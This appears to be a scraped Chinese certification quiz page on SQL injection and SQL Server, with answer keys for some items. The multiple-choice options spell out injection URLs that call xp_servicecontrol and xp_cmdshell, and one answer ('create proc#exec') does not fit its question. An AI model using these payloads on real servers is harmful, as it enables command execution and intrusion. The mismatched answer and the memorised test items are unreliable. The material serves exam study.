以下哪条命令能利用“SQL”漏洞动用XP_cmdshell存储过程，启动或停止某项服务?()A、http://localhost/script?’:EXEC+master..XP_servicecontrol+’start’,+’Server’;-B、http://localhost/script?0’:EXEC+master..XP_servicecontrol+’start’,+’Server’;--C、http://localhost/script?1’:EXEC+master..XP_servic - itgle

题目

以下哪条命令能利用“SQL”漏洞动用XP_cmdshell存储过程，启动或停止某项服务?()

A、http://localhost/script?’:EXEC+master..XP_servicecontrol+’start’,+’Server’;-

B、http://localhost/script?0’:EXEC+master..XP_servicecontrol+’start’,+’Server’;--

C、http://localhost/script?1’:EXEC+master..XP_servicecontrol+’start’,+’Server’;--

D、http://localhost/script?0’:EXEC+master..XP_servicecontrol+’start’,+’Server’--

相似考题

1.下列操作中,()不是SQLServer服务器管理器功能。A.启动SQLServer服务B.停止SQLServer服务C.执行SQL查询命令D.暂停SQLServer服务

2.下列操作中，哪个不是SQLServer服务管理器功能()?A、执行SQL查询命令B、停止SQLServer服务C、暂停SQLServer服务D、启动SQLServer服务

3.以下哪条命令能利用“SQL注入”漏洞动用XP_cmdshell存储过程，获得某个子目的清单?()A、http://localhost/script?’:EXEC+master..XP_cmdshell+’dir’:--B、http://localhost/script?1’:EXEC+master..XP_cmdshell+’dir’:--C、http://localhost/script?0’:EXEC+master..XP_cmdshell+’dir’:--D、http://localhost/script?1’:EXEC+master..XP_cmdshell+’dir’--

4.以下哪条命令可以关闭数据库监听()A.lsnrctlstopB.lsnrctlstopC.sql>lsnrctlstopD.lsnrctlquit

更多“以下哪条命令能利用“SQL”漏洞动用XP_cmdshell存储过程,启动或停止某项服务?()A、http:／／local ”相关问题

第1题：

在SQLServer中具有sysadmin权限的用户可以通过xp_cmdshell存储扩展以system的权限执行任意系统命令。()

答案：正确
第2题：

在Oracle中具有system权限的用户可以通过xp_cmdshell存储扩展以system的权限执行系统命令。()

答案：错误
第3题：

只能通过T-SQL命令创建存储过程。

create proc#exec
第4题：

现今非常流行的SQL(数据库语言)注入攻击属于下列哪一项漏洞的利用()。

A.域名服务的欺骗漏洞
B.邮件服务器的编程漏洞
C.WWW服务的编程漏洞
D.FTP服务的编程漏洞

参考答案：C
第5题：

33、常见漏洞有SQL注入漏洞、弱口令漏洞、远程命令执行漏洞、权限绕过漏洞。

正确

相关内容